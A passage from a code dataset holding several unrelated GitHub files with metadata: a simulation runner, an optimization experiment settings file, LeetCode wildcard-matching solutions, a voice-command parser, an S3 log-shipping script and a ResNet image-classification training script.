action=\"store\")\n\n args = parser.parse_args()\n if args.debug:\n print (args)\n\n json_file = \"../configuration/\" + args.json_file\n print (os.path.isfile(json_file))\n try:\n f = open(json_file, \"r\")\n json_data = json.load(f)\n except (OSError, ValueError):\n # OSError: missing/unreadable file; ValueError: malformed JSON\n print(\"Failed to open or parse %s\" % (json_file))\n sys.exit(-1)\n\n steps = sorted(json_data['flow_steps'].items())\n print (steps)\n for step in steps:\n print(\"\\n\\nRunning Step: %s \" % step[0])\n print(\"Executable: %s \" % json_data['flow'][step[1]]['executable'])\n print(\"Arguments: %s \" % json_data['flow'][step[1]]['arguments'])\n executable = json_data['flow'][step[1]]['executable']\n arguments = json_data['flow'][step[1]]['arguments']\n executable = which(executable)\n if arguments is None:\n command = executable\n else:\n command = executable + \" \" + str(arguments)\n\n if args.gui and 'gui' in json_data['flow'][step[1]]:\n command = command + json_data['flow'][step[1]]['gui']\n\n print(command)\n command = shlex.split(command)\n p = subprocess.Popen(command)\n p.wait()\n","repo_name":"ptracton/Picoblaze","sub_path":"tools/run_sim.py","file_name":"run_sim.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
{"seq_id":"38390075350","text":"from utility.constant import *\r\nimport utility.gloabl_values as g\r\n\r\n\"\"\" 重要な実験設定 \"\"\"\r\n# 最適化したい問題\r\nproblem_list = [NONCONSTRAINT, BOXCONSTRAINT, DISKCONSTRAINT]\r\nproblem_list = [DISKCONSTRAINT]\r\nproblem_list = [NONCONSTRAINT]\r\n# problem_list = [INEQUALITYCONSTRAINT]\r\n\r\n# データの形状\r\ndata_type_list = [SINX01MOUNT2, ROSENBROCK, ACKELY]\r\ndata_type_list = [XSQUARE, MOUNT2]\r\n# data_type_list = [ROSENBROCK]\r\n# data_type_list = [SINX01MOUNT2]\r\ndata_type_list = [SINX0MOUNT2]\r\n# data_type_list = [ACKELY]\r\ndata_type_list = [XSQUARE]\r\n# # data_type_list = [COMPLEX7]\r\n# data_type_list = [MOUNT2]\r\n# data_type_list = [SINX0]\r\n\r\n# 最適化手法\r\n# opt_list = [TRUSTREGION]\r\nopt_list = [MATHMATICALOPTIMIZATION, SIMULATEDANNEALING, FRANKWOLFE, SELECTBESTDATA]\r\n# opt_list = [SIMULATEDANNEALING, FRANKWOLFE, FRANKWOLFE2, SELECTBESTDATA]\r\n# opt_list = [FRANKWOLFE2, SELECTBESTDATA]\r\nopt_list = [FRANKWOLFE, SELECTBESTDATA]\r\nopt_list = [FRANKWOLFE]\r\n# opt_list = [SIMULATEDANNEALING]\r\n# opt_list = [FRANKWOLFE2]\r\n# opt_list = [MATHMATICALOPTIMIZATION]\r\n# opt_list = [SELECTBESTDATA]\r\n\r\n# 機械学習手法\r\nml_list = 
[POLYNOMIALREGRESSION, SVRGAUSS, LIGHTGBM, KNNLINEARREGRESSION]\r\n# ml_list = [POLYNOMIALREGRESSION, LIGHTGBM, ANNLINEARREGRESSION]\r\n# ml_list = [LIGHTGBM, WEIGHTEDLINEARREGRESSION]\r\n# ml_list = [LIGHTGBM]\r\n# ml_list = [SVRGAUSS]\r\n# # # ml_list = [SVRGAUSS, LIGHTGBM, ANNLINEARREGRESSION]\r\n# ml_list = [ANNLINEARREGRESSION]\r\n# ml_list = [KNNLINEARREGRESSION]\r\n# ml_list = [NEURALNETWORK, SVRGAUSS, LIGHTGBM, LINEARREGRESSION]\r\n# ml_list = [WEIGHTEDLINEARREGRESSION]\r\n# ml_list = [CGA2M]\r\n# ml_list = [LIGHTGBM, NEURALNETWORK]\r\n# ml_list = [POLYNOMIALREGRESSION]\r\n\r\n\r\n# シード\r\nseed_list = list(range(10))\r\nseed_list = list(range(5))\r\n# seed_list = [0]\r\n# seed_list = list(range(3))\r\n# seed_list = [4]\r\nval_list = list(range(1))\r\n\r\n\"\"\" 比較の為に変更するパラメータ \"\"\"\r\nn_item_list = list(range(1, 4))\r\nn_item_list = [1]\r\n# n_data_list = [2500, 5000, 7500, 10000, 12500, 15000, 17500, 20000]\r\nn_data_list = [200, 1000]\r\n# n_data_list = [1000]\r\n# n_data_list = [50]\r\n# n_data_list = [2500]\r\n# n_data_list = [100]\r\nn_feature_list = [1, 5, 10, 30]\r\n# n_feature_list = [1]\r\nn_feature_list = [5, 10, 15, 20, 25, 30, 35, 40, 45, 50]\r\n# n_feature_list = [5, 10, 15]\r\n# n_feature_list = [30, 50]\r\n# n_feature_list = [5]\r\n# n_feature_list = [10]\r\n# n_feature_list = [1]\r\nn_user_available_x_list = n_feature_list\r\n\r\nnoise_sigma_list = list(range(0, 5))\r\nnoise_sigma_list = [1, 2, 3]\r\nnoise_sigma_list = [5]\r\n# noise_sigma_list = [3]\r\n# noise_sigma_list = [3]\r\nn_nearest_list = list(range(10, 1010, 10))\r\n# n_nearest_list = [400]\r\n# n_nearest_list = list(range(10, 110, 10))\r\n# n_nearest_list = list(range(10, 310, 10))\r\n# n_nearest_list = [10, 20, 30]\r\n# noise_sigma_list = [2]\r\n# noise_sigma_list = [1]\r\n\r\n# n_item_list = list(range(1, 2))\r\n# n_data_list = [100, 500]\r\n# n_feature_list = [1, 2]\r\n# n_user_available_x_list = [1, 2]\r\n\r\n# weight_sigma_list = [0.1]\r\n\r\n\r\n\"\"\" 固定するパラメータ \"\"\"\r\nn_split = 5\r\ntrain_rate = 0.8\r\neval_rate = 0.2\r\nn_trial = 10\r\nn_val_data = 100\r\nn_feature_particle = 25\r\nn_max_iteration = 1000\r\nfinish_epsilon = 0.25\r\n\r\n\r\n\r\n\"\"\" 実験上の設定\"\"\"\r\nis_only_learning = False # 学習のみを行うか\r\nis_integrate_ml = False # 予測器を一つにまとめるか\r\nalready_optimize_ok = False # 最適化を再度行うか\r\nis_only_shape_check = False # 形状の出力のみを行うか\r\nsame_val_data_size = True # valデータを固定数生成するか\r\nsearch_hyper_paramerter = False # ハイパラ調整を行うか\r\nonly_user_available_x = True # ユーザの動かせる変数のみに絞るか\r\nonly_appropriate_feature = False # 無駄な特徴量の存在するパターンは排除するか\r\nrandom_initialize_x = False # ランダムに初期解を選ぶか.Falseなら最もデータ点が高い位置からスタート\r\nis_plot_proposed_method = False # 提案手法の特性についてプロットするか\r\nforce_minimize = True # 強制的に最小化問題に結果を置き換えるか\r\nuse_real_data = False # 現実データを使うか否か\r\nis_x_normal = True # xを正規分布に従って発生させるか\r\nvisualize_optimization_process_status = DONTSEE # 最適化途中の可視化\r\nauto_n_nearest = False\r\n\r\nis_taisu = False # 片対数グラフをプロットするか\r\nuse_errorbar = False # エラーバーにするか散布図にするか\r\n\r\n\r\n\r\n\"\"\"その他の設定\"\"\"\r\nalpha = 0.5\r\nmin_xs = -1 #0.\r\nmax_xs = 1 # 300.\r\nmin_xs = -5\r\nmax_xs = 5\r\nmin_xs = -10\r\nmax_xs = 10\r\n# min_xs = 0\r\n# max_xs = 10\r\nbase_th_distance = 1.5\r\ndelta = 0.1\r\n\r\nx_scale = 1\r\nn_nearest_best_rate = 0.4\r\n\r\n\r\n# # 実験1\r\n# zikken_id = 1\r\n# already_optimize_ok = True # 最適化を再度行うか\r\n# n_data_list = [1000]\r\n# n_feature_list = [10]\r\n# n_nearest_list = list(range(10, 1010, 10))\r\n# # n_nearest_list = [10]\r\n# auto_n_nearest = False\r\n# is_x_normal = False # 
xを正規分布に従って発生させるか\r\n# x_scale = 3\r\n# is_taisu = True\r\n# opt_list = [FRANKWOLFE2, SELECTBESTDATA]\r\n# opt_list = [FRANKWOLFE2]\r\n# data_type_list = [XSQUARE]\r\n# plot_name_dic[(solvers_names[FRANKWOLFE2], mlmodel_names[KNNLINEARREGRESSION])] = \"提案手法\"\r\n\r\n# 実験1.5\r\n# zikken_id = 2\r\n# already_optimize_ok = True # 最適化を再度行うか\r\n# n_data_list = [100, 500, 1000, 1500, 2000, 2500, 3000, 3500, 4000, 4500, 5000]\r\n# n_data_list = [100, 500, 1000, 1500, 2000, 2500]\r\n# # n_data_list = [2500]\r\n# n_feature_list = [10]\r\n# is_x_normal = False # xを正規分布に従って発生させるか\r\n# opt_list = [FRANKWOLFE, SIMULATEDANNEALING] # SELECTBESTDATA]\r\n# opt_list = [FRANKWOLFE2, SIMULATEDANNEALING, MATHMATICALOPTIMIZATION, SELECTBESTDATA]\r\n# # opt_list = [FRANKWOLFE]\r\n# opt_list = [FRANKWOLFE2]\r\n# # opt_list = [SIMULATEDANNEALING]\r\n# # opt_list = [MATHMATICALOPTIMIZATION]\r\n# # opt_list = [SELECTBESTDATA]\r\n# ml_list = [POLYNOMIALREGRESSION, LIGHTGBM, KNNLINEARREGRESSION]\r\n# # ml_list = [POLYNOMIALREGRESSION]\r\n# # ml_list = [LIGHTGBM, KNNLINEARREGRESSION]\r\n# data_type_list = [LOGX]\r\n# g.coef = 10\r\n# # data_type_list = [LOGX2]\r\n# min_xs = 0\r\n# max_xs = 10\r\n# problem_list = [INEQUALITYCONSTRAINT]\r\n# # n_nearest_list = list(range(10, 1010, 10))\r\n# n_nearest_best_rate = 0.1\r\n# auto_n_nearest = True\r\n# plot_name_dic[(solvers_names[FRANKWOLFE], mlmodel_names[KNNLINEARREGRESSION])] = \"提案手法(1000反復)\"\r\n# plot_name_dic[(solvers_names[FRANKWOLFE2], mlmodel_names[KNNLINEARREGRESSION])] = \"提案手法\"\r\n# color_dic[(solvers_names[FRANKWOLFE2], mlmodel_names[KNNLINEARREGRESSION])] = \"blue\"\r\n\r\n# #実験2\r\nzikken_id = 2\r\nalready_optimize_ok = False # 最適化を再度行うか\r\nn_data_list = [1000]\r\n# n_data_list = [200]\r\nn_nearest_best_rate = 0.12\r\nn_data_list = [500, 1000, 1500, 2000, 2500] #, 3000, 3500, 4000, 4500, 5000]\r\n# n_feature_list = [5, 10, 15, 20, 25, 30, 35, 40, 45, 50]\r\nn_feature_list = [10]\r\nn_feature_list = [50]\r\n# n_feature_list = [10, 20, 30, 40, 50]\r\nis_x_normal = False # xを正規分布に従って発生させるか\r\nx_scale = 3\r\n# problem_list = [INEQUALITYCONSTRAINT]\r\nml_list = [POLYNOMIALREGRESSION, LIGHTGBM, KNNLINEARREGRESSION]\r\nopt_list = [MATHMATICALOPTIMIZATION, SIMULATEDANNEALING, FRANKWOLFE2, SELECTBESTDATA]\r\n# opt_list = [FRANKWOLFE2, SELECTBESTDATA]\r\n# opt_list = [SELECTBESTDATA]\r\ndata_type_list = [SINX0MOUNT2]\r\n# data_type_list = [ACKELY]\r\ndata_type_list = [RASTRIGIN]\r\n# data_type_list = [ROSENBROCK]\r\n# data_type_list = [XSQUARE]\r\ndata_type_list = [GOLDSTEINPRICE]\r\n# data_type_list = [BOOTH]\r\n# data_type_list = [EASOM]\r\n# data_type_list = [BEALE]\r\ndata_type_list = [XSQUARE]\r\nauto_n_nearest = True\r\nplot_name_dic[(solvers_names[FRANKWOLFE2], mlmodel_names[KNNLINEARREGRESSION])] = \"提案手法\"\r\n\r\n\r\n#実験3\r\n# zikken_id = 3\r\n# min_xs = 0\r\n# max_xs = 300\r\n\r\n#Directory\r\nhome_dir = \"./\"\r\n# ml_dir = home_dir + \"machine_learning/\"\r\nif is_x_normal:\r\n result_dir = home_dir + f\"result/normalize/x_s{x_scale}/\"\r\nelse:\r\n result_dir = home_dir + \"result/uniform/\"\r\n\r\nprocess_dir = result_dir + \"process/\"\r\nml_model_dir = result_dir + \"machine_learning/\"\r\nsaved_model_dir = ml_model_dir + \"saved_model\"\r\nsaved_data_dir = result_dir + \"data\"\r\nml_shape_dir = ml_model_dir + \"shape\"\r\nml_info_dir = ml_model_dir + \"info\"\r\nopt_dir = result_dir + \"optimization\"\r\n\r\n\"\"\" ML手法 オート設定モード\"\"\"\r\nconstr_ml_for_opt = {SIMULATEDANNEALING: [NEURALNETWORK, LIGHTGBM], TRUSTREGION: [LIGHTGBM], FRANKWOLFE: 
[WEIGHTEDLINEARREGRESSION, ANNLINEARREGRESSION, KNNLINEARREGRESSION],\r\n MATHMATICALOPTIMIZATION: [LINEARREGRESSION, POLYNOMIALREGRESSION, SVRLINEAR, SVRPOLY, SVRGAUSS, CGA2M], STEPDISTANCE: [ANNLINEARREGRESSION],\r\n BAYESIANOPTIMIZATIONMU: [GAUSSIANPROCESSREGRESSION], BAYESIANOPTIMIZATIONLCB: [GAUSSIANPROCESSREGRESSION], SELECTBESTDATA: [KNNLINEARREGRESSION],\r\n FRANKWOLFE2: [KNNLINEARREGRESSION]}\r\n\r\n\"\"\" 問題+データタイプ オート設定モード\"\"\"\r\nconstr_problem_data_for_opt = {NONCONSTRAINT: [SINX0, SINX0MOUNT2, SINX01MOUNT2, COMPLEX7, ROSENBROCK, ACKELY, XSQUARE, MOUNT2, RASTRIGIN, LOGX, LOGX2, BOOTH, GOLDSTEINPRICE, EASOM, BEALE], \r\n BOXCONSTRAINT: [SINX0, SINX0MOUNT2, SINX01MOUNT2, COMPLEX7, ROSENBROCK, ACKELY, XSQUARE, MOUNT2, GOLDSTEINPRICE, BOOTH, EASOM, BEALE],\r\n BOXFEATURECONSTRAINT: [SINX0, SINX0MOUNT2, SINX01MOUNT2, COMPLEX7, ROSENBROCK, ACKELY, XSQUARE, MOUNT2, GOLDSTEINPRICE, BOOTH, EASOM, BEALE], \r\n DISKCONSTRAINT: [SINX0, SINX0MOUNT2, SINX01MOUNT2, COMPLEX7, ROSENBROCK, ACKELY, XSQUARE, MOUNT2, GOLDSTEINPRICE, BOOTH, EASOM, BEALE],\r\n INEQUALITYCONSTRAINT: [SINX0, SINX0MOUNT2, SINX01MOUNT2, COMPLEX7, ROSENBROCK, ACKELY, RASTRIGIN, XSQUARE, MOUNT2, LOGX, LOGX2, GOLDSTEINPRICE, BOOTH, EASOM, BEALE]\r\n }\r\n\r\n\"\"\" 問題+特徴量数 オート設定モード\"\"\"\r\nbad_constr_problem_ufeature_for_opt = {NONCONSTRAINT: [], BOXCONSTRAINT: [], BOXFEATURECONSTRAINT: [1], DISKCONSTRAINT: [], INEQUALITYCONSTRAINT: []}\r\n\r\n\"\"\" データタイプ+特徴量数 オート設定モード\"\"\"\r\nbad_constr_data_feature_for_opt = {SINX0: [], SINX0MOUNT2: [], SINX01MOUNT2: [], COMPLEX7: list(range(1, 7)), ROSENBROCK: [1], GOLDSTEINPRICE: [1], BOOTH: [1], EASOM: [1], ACKELY: [1], BEALE: [1], XSQUARE: [], MOUNT2: [], RASTRIGIN: [], LOGX: [], LOGX2: []}\r\n\r\n\"\"\" データタイプ+特徴量数 オート設定モード\"\"\"\r\nappropriate_data_feature_for_opt = {SINX0: [2], SINX0MOUNT2: [2], SINX01MOUNT2: [2], COMPLEX7: [7], ROSENBROCK: [2], GOLDSTEINPRICE: [2], BOOTH: [2], EASOM: [2], BEALE: [2], ACKELY: [2], XSQUARE: [2], MOUNT2:[2]}\r\n\r\n\"\"\" 数理計画法の定式化\"\"\"\r\nformalization_ml_problem = {LINEARREGRESSION: LP, WEIGHTEDLINEARREGRESSION: LP, RANDOMFOREST: MIP, LIGHTGBM: MIP, SVRLINEAR: LP, SVRPOLY: NLP, SVRGAUSS: NLP,\r\n ANNLINEARREGRESSION: LP, KNNLINEARREGRESSION: LP, CGA2M: MIP, POLYNOMIALREGRESSION: NLP}\r\n\r\n\r\nif auto_n_nearest:\r\n n_nearest_list = [int(n_data_list[i] * n_nearest_best_rate) for i in range(len(n_data_list))]","repo_name":"tokyotech-nakatalab/ApproximateFrankWolfe","sub_path":"utility/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":11202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6571211395","text":"\"\"\"This is an accepted DP solution\"\"\"\nclass Solution(object):\n def isMatch(self, s, p):\n \"\"\"\n :type s: str\n :type p: str\n :rtype: bool\n \"\"\"\n def initDPMatrice(m, n):\n f = list()\n for i in xrange(m):\n f.append([False]*n)\n return f\n \n # This matrix entry f[i][j] tells the first\n # i chars of s can be matched to the first\n # j chars of p.\n f = initDPMatrice(len(s)+1, len(p)+1)\n f[0][0] = True;\n \n for i in xrange(len(s)+1):\n for j in xrange(len(p)+1):\n # we always have \"f[i][j] = f[i][j] or ...\"\n # because the value of f[i][j]\n # can be updated in multiple 'if' conditions\n \n # case 1: use the current '*' for p, and\n # still use it in the sub-comparison in f[i-1][j]\n if j > 0 and i > 0 and p[j-1] == '*':\n f[i][j] = f[i][j] or f[i-1][j]\n \n # case 2: don't use the current '*' for p\n if j > 0 and p[j-1] == '*':\n 
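                # (Added explanatory note.) Skipping the '*' means it matches the
                # empty string: the first i chars of s must then match the first
                # j-1 chars of p, which is exactly the subproblem f[i][j-1] below.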
f[i][j] = f[i][j] or f[i][j-1]\n \n # case 3: consuming one char for both s and p\n if j > 0 and i > 0 and (p[j-1] == '*' or p[j-1] == '?' or s[i-1] == p[j-1]):\n f[i][j] = f[i][j] or f[i-1][j-1];\n return f[len(s)][len(p)];\n \n \n\n\n\n\"\"\"This recursive solution is time limit exceeded\n(because there are too many duplicate comparisons\nin the recursive functions),\nbut can give the general idea.\"\"\"\nclass Solution(object):\n def isMatch(self, s, p):\n \"\"\"\n :type s: str\n :type p: str\n :rtype: bool\n \"\"\"\n if len(s) + len(p) == 0:\n return True\n if len(s) * len(p) == 0:\n notEmpty = p if len(s)==0 else s\n for c in notEmpty:\n if c != '*':\n return False\n return True\n \n if p[0] == '*':\n return self.isMatch(s, p[1:]) or self.isMatch(s[1:], p[1:]) or self.isMatch(s[1:], p)\n elif p[0] == '?':\n return self.isMatch(s[1:], p[1:])\n else: # an ordinary char\n return s[0] == p[0] and self.isMatch(s[1:], p[1:])\n \n \n","repo_name":"patrick-luo/Leet-Code","sub_path":"044. Wildcard Matching.py","file_name":"044. Wildcard Matching.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"22474033992","text":"from webhandler import *\nfrom GUI import GUI\n\n# parses the input text and determines a valid command\n\n\napp = [\"app\", \"application\", \"launch\",\"launches\",\"apps\",\"applications\"]\nsearch = [\"google\", \"bing\", \"search\", \"look up\",\"googles\"]\nurl = [\"open\", \"goto\", \"go to\", \"url\", \"website\", \"web\",\"opens\"]\nmouseMove = [\"move\", \"cursor\",\"moves\"]\nmouseScroll = [\"scroll\", \"up\", \"down\",\"scrolls\"]\nmouseClick = [\"click\", \"press\"]\nmouseDoubleClick = [\"doublepress\",\n \"doubleclick\", \"double\"]\nkeyboardType = [\"type\", \"input\"]\nkeyboardHold = [\"hold\"]\nkeyboardRelease = [\"release\", \"unhold\"]\n\nmusic = [\"play music\"]\n\n'''\nTypes:\napp\nsearch\nurl\nmouseMove\nmouseScroll\nmouseClick\nmouseDoubleClick\nkeyboardType\n\nkeyboardHold\nkeyboardRelease\n\n\n'''\n\n# returns [command type, parameters]\n\n\ndef GetCommand(text):\n a = []\n inputArray = text.strip().split()\n for x in range(len(inputArray) - 1):\n v = inputArray[x]\n\n if v in search:\n a = [\"search\", \" \".join(inputArray[x + 1:])]\n break\n elif v in url:\n a = [\"url\", \" \".join(inputArray[x + 1:])]\n break\n elif v in app:\n a = [\"app\", \" \".join(inputArray[x + 1:])]\n break\n elif v in mouseScroll:\n a = [\"mouseScroll\", inputArray[x + 1]]\n break\n elif v in mouseClick:\n a = [\"mouseClick\", \"\"]\n break\n elif v in mouseDoubleClick:\n a = [\"mouseDoubleClick\", \"\"]\n break\n elif v in mouseMove:\n a = [\"mouseMove\", \" \".join(inputArray[x + 1:])]\n break # keep parity with the other branches so later keywords cannot override\n elif v in keyboardType:\n a = [\"keyboardType\", \" \".join(inputArray[x + 1:])]\n break\n elif v in keyboardHold:\n a = [\"keyboardHold\", inputArray[x + 1]]\n break\n elif v in keyboardRelease:\n a = [\"keyboardRelease\", inputArray[x + 1]]\n break\n elif v + \" \" + inputArray[x + 1] in music:\n a = [\"music\", \"playpause\"]\n break\n\n if len(a) == 0 and len(inputArray) > 0:\n if inputArray[-1] in mouseClick:\n a = [\"mouseClick\", \"\"]\n elif inputArray[-1] in mouseDoubleClick:\n a = [\"mouseDoubleClick\", \"\"]\n\n if len(a) == 0:\n GUI.UpdateGuiSpeed(False)\n return 
a\n","repo_name":"TT1103/PyVoiceControl","sub_path":"PyVoiceControl/scripts/textparser.py","file_name":"textparser.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10601417749","text":"\"\"\"\n1. Find all files not modified in last 2 days.\n2. For each file push to S3 and delete file.\n\nThe time limit will be configurable\nS3 bucket will be configurable\n\"\"\"\n\nimport os\n\nfrom datetime import datetime\n\nimport file_finder\nimport settings\nimport s3_uploader\nimport logger\n\nlogger = logger.get_logger()\n\ndef find_all_files(current_datetime):\n # get directories from settigs\n # get days cutoff from settings\n found_files_info=[]\n cutoff_days=settings.CONST_NUM_DAYS_CUTOFF\n for dir_path, dir_s3_key in settings.CONST_DIRECTORIES_TO_WATCH:\n for file_info in file_finder.find_files_in_dir(dir_path, cutoff_days, current_datetime):\n found_files_info.append((file_info, dir_s3_key))\n return found_files_info\n\ndef upload_to_s3(s3_uploader_obj, file_info, dir_s3_key, current_datetime):\n try:\n #eg. QA/tomcat/20-2-2020/logmanager.txt\n file_s3_upload_key=f\"{settings.S3_BUCKET_UPLOAD_DIR_ROOT}/{dir_s3_key}/{current_datetime.date()}/{file_info.name}\"\n if s3_uploader_obj.upload_file(\n file_info.path, settings.S3_BUCKET_NAME, file_s3_upload_key):\n logger.info(f\"[upload_to_s3]:[Uploaded][{file_info.path}][{settings.S3_BUCKET_NAME}][{file_s3_upload_key}]\")\n return True\n else:\n logger.info(f\"[upload_to_s3]:[Upload failed][{file_info.path}][{settings.S3_BUCKET_NAME}][{file_s3_upload_key}]\")\n except Exception as e:\n logger.exception(e)\n return False\n\ndef delete_file(file_info):\n #delete file here\n deleted=False\n try:\n os.remove(file_info.path)\n logger.info(f\"[delete_file]:[Deleted][{file_info.path}]\")\n except OSError as e:\n logger.exception(e)\n\nif __name__==\"__main__\":\n current_datetime=datetime.now()\n\n logger.info(f\"[started]\")\n\n found_files_info=find_all_files(current_datetime)\n logger.debug(f\"[found files][{found_files_info}]\")\n\n if settings.CONST_UPLOAD_TO_s3:\n s3_uploader_obj = s3_uploader.S3Uploader(\n settings.AWS_CONFIG['aws_access_key_id'],\n settings.AWS_CONFIG['aws_secret_access_key'],\n None\n )\n\n try:\n for file_info, dir_s3_key in found_files_info:\n can_delete=True\n if settings.CONST_UPLOAD_TO_s3:\n can_delete=upload_to_s3(s3_uploader_obj, file_info, dir_s3_key, current_datetime)\n if settings.CONST_DELETE_FILES:\n if can_delete: delete_file(file_info)\n except Exception as e:\n logger.exception(e)\n\n logger.info(f\"[ended]\")\n","repo_name":"mahoriR/log_ship_s3","sub_path":"log_ship.py","file_name":"log_ship.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30207423575","text":"import os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torchvision.transforms as transforms\nfrom torchvision import datasets\nfrom torch.utils.data import DataLoader, Dataset\nimport matplotlib.pyplot as plt\n\n# Device configuration\ndevice = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\nprint(f'Using {device} for inference')\n\n\n# show image\ndef image_show(image_s, labels_s):\n m = 1\n figure = plt.figure(figsize=(5, 5))\n for j in range(6):\n figure.add_subplot(3, 3, m)\n plt.axis(\"off\")\n img = image_s[j].squeeze()\n plt.imshow(np.transpose(img, (1, 2, 0)), cmap='gray')\n 
plt.title(classes[labels_s[j]])\n m += 1\n plt.show()\n\n\n# accuracy\ndef accuracy_check(data_image):\n model.eval()\n with torch.no_grad():\n correct = 0\n total = 0\n for images_1, labels_1 in data_image:\n images_1 = images_1.to(device)\n labels_1 = labels_1.to(device)\n outputs_1 = model(images_1)\n _, predicted = torch.max(outputs_1.data, 1)\n total += labels_1.size(0)\n correct += (predicted == labels_1).sum().item()\n acc = 100 * correct / total\n return acc\n\n\n# locc check\ndef loss_checker(img, lbl):\n running_loss = 0.0\n img, lbl = img.to(device), lbl.to(device)\n out = model(img)\n loss_1 = criterion(out, lbl)\n optimizer.zero_grad()\n loss_1.backward()\n optimizer.step()\n running_loss += loss_1.item()\n return running_loss\n\n\n# Hyper-parameters\naccuracy_train, accuracy_test, loss_train, loss_test = [], [], [], []\nbatch_size = 128\nlearning_rate = 0.001\n\n\n# Image preprocessing modules\ntransform = transforms.Compose([\n transforms.CenterCrop(150),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n])\n\ntransform_p = transforms.Compose([\n transforms.CenterCrop(150),\n transforms.ToTensor(),\n])\n\n# real images dataset\ntrain_data = os.path.join('multi-class_data/seg_train')\ntest_data = os.path.join('multi-class_data/seg_test')\nimage_data = os.path.join('multi-class_data/test')\n\nclasses = ['buildings', 'forest', 'glacier', 'mountain', 'sea', 'street']\n\n\nclass CustomData(Dataset):\n def __init__(self, t_data, te_data, p_data, transform_s, transforms_p):\n self.train_data = t_data\n self.test_data = te_data\n self.predicted_data = p_data\n self.transform = transform_s\n self.transform_p = transforms_p\n\n def __getitem__(self, item):\n pass\n\n def data_getter(self):\n train_set = datasets.ImageFolder(self.train_data, self.transform)\n data = DataLoader(train_set, batch_size=128, shuffle=True)\n return data\n\n def test_data_getter(self):\n test_set = datasets.ImageFolder(self.test_data, self.transform)\n t_data = DataLoader(test_set, batch_size=128, shuffle=True)\n return t_data\n\n def prediction_data_getter(self):\n pred_set = datasets.ImageFolder(self.predicted_data, self.transform_p)\n p_data = DataLoader(pred_set, batch_size=10, shuffle=True)\n return p_data\n\n\ncds = CustomData(train_data, test_data, image_data, transform, transform_p)\nimage = cds.data_getter()\ntest_image = cds.test_data_getter()\nprediction_image = cds.prediction_data_getter()\n\n\n# 3x3 convolution\nprint('Preparing the Neural Network')\n\n\ndef conv3x3(in_channels, out_channels, stride=(1, 1)):\n return nn.Conv2d(in_channels, out_channels, (3, 3), stride=stride, padding=1, bias=False)\n\n\n# Residual block\nclass ResidualBlock(nn.Module):\n def __init__(self, in_channels, out_channels, stride=1, downsample=None):\n super(ResidualBlock, self).__init__()\n self.conv1 = conv3x3(in_channels, out_channels, stride)\n self.bn1 = nn.BatchNorm2d(out_channels)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(out_channels, out_channels)\n self.bn2 = nn.BatchNorm2d(out_channels)\n self.downsample = downsample\n\n def forward(self, x):\n residual = x\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n out = self.conv2(out)\n out = self.bn2(out)\n if self.downsample:\n residual = self.downsample(x)\n out += residual\n out = self.relu(out)\n return out\n\n\n# ResNet\nclass ResNet(nn.Module):\n def __init__(self, block, layers, num_classes=6):\n super(ResNet, self).__init__()\n self.in_channels = 16\n self.conv = conv3x3(3, 16)\n self.bn = 
nn.BatchNorm2d(16)\n self.relu = nn.ReLU(inplace=True)\n self.layer1 = self.make_layer(block, 16, layers[0])\n self.layer2 = self.make_layer(block, 32, layers[1], 2)\n self.layer3 = self.make_layer(block, 64, layers[2], 2)\n self.avg_pool = nn.AvgPool2d(8)\n self.fc = nn.Linear(1024, num_classes)\n\n def make_layer(self, block, out_channels, blocks, stride=1):\n layers = []\n downsample = None\n if (stride != 1) or (self.in_channels != out_channels):\n downsample = nn.Sequential(\n conv3x3(self.in_channels, out_channels, stride=stride),\n nn.BatchNorm2d(out_channels)\n )\n layers.append(block(self.in_channels, out_channels, stride, downsample))\n self.in_channels = out_channels\n for m in range(1, blocks):\n layers.append(block(out_channels, out_channels))\n return nn.Sequential(*layers)\n\n def forward(self, x):\n out = self.conv(x)\n out = self.bn(out)\n out = self.relu(out)\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.avg_pool(out)\n out = out.view(out.size(0), -1)\n out = self.fc(out)\n return out\n\n\nmodel = ResNet(ResidualBlock, [2, 2, 2]).to(device)\n\n# Loss and optimizer\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\n\n# For updating learning rate\ndef update_lr(optimizer1, lr):\n for param_group in optimizer1.param_groups:\n param_group['lr'] = lr\n\n\n# Train the model\ndef train(num_epochs):\n curr_lr = learning_rate\n for epoch in range(num_epochs):\n for i, (images, labels) in enumerate(image):\n # images = images.to(device)\n # labels = labels.to(device)\n #\n # # Forward pass\n # outputs = model(images)\n # loss = criterion(outputs, labels)\n #\n # # Backward and optimize\n # optimizer.zero_grad()\n # loss.backward()\n # optimizer.step()\n loss_train.append(loss_checker(images, labels))\n accuracy_train.append(accuracy_check(image))\n if (i + 1) % 100 == 0:\n print(f\"(train)Epoch [{epoch + 1}/{num_epochs}], Loss: {loss_checker(images, labels)}\")\n print(f'Accuracy of the model on the images: {accuracy_check(image)}')\n for m, (images1, labels1) in enumerate(test_image):\n\n loss_test.append(loss_checker(images1, labels1))\n accuracy_test.append(accuracy_check(test_image))\n if (m + 1) % 100 == 0:\n print(f\"(test)Epoch [{epoch + 1}/{num_epochs}], Loss: {loss_checker(images1, labels1)}\")\n print(f'Accuracy of the model on the test images: {accuracy_check(test_image)}')\n\n # Decay learning rate\n if (epoch + 1) % 20 == 0:\n curr_lr /= 3\n update_lr(optimizer, curr_lr)\n\n\nprint('Training')\ntrain(50)\nprint('Finished Training')\nprint('Saving')\ntorch.save(model.state_dict(), 'myResnet50.pth')\nprint('Saved')\n\nprint(loss_train, 